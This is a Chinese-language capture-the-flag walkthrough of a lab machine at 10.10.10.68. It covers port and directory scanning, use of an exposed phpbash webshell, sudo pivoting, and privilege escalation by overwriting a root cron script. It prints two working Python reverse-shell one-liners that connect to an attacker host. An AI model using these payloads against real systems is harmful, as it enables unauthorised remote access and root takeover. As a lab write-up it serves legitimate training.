基本信息

端口扫描

就一个80:

1
2
3
4
5
6
7
8
9
10
11
12
$ nmap -sC -sV 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-11 15:00 CST
Nmap scan report for 10.10.10.68
Host is up (0.070s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.43 seconds

80

phpbash:

目录扫描

扫描发现dev目录,里面有个phpbash.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
gobuster dir -u http://10.10.10.68/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/css (Status: 301)
/dev (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/php (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)

phpbash

这就是自带的webshell:

reverse shell

phpbash直接用常规的nc打不回来reverse shell,可以用python:

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

user flag

当前虽然是www-data用户,但已经有权限去读arrexel用户目录的user.txt了:

提权信息

scriptmanager

www-data用户可以以scriptmanager身份执行任意命令,那就先切到scriptmanager用户:

1
2
sudo -u scriptmanager /bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'

scripts

根目录有个scripts目录,里面文件提示很明显,py是scriptmanager权限,txt是root权限,应该就是root定时运行test.py:

提权 & root flag:

那就直接修改test.py,得到root shell, 读取root.txt:

1
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.10\",4446));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > test.py

参考资料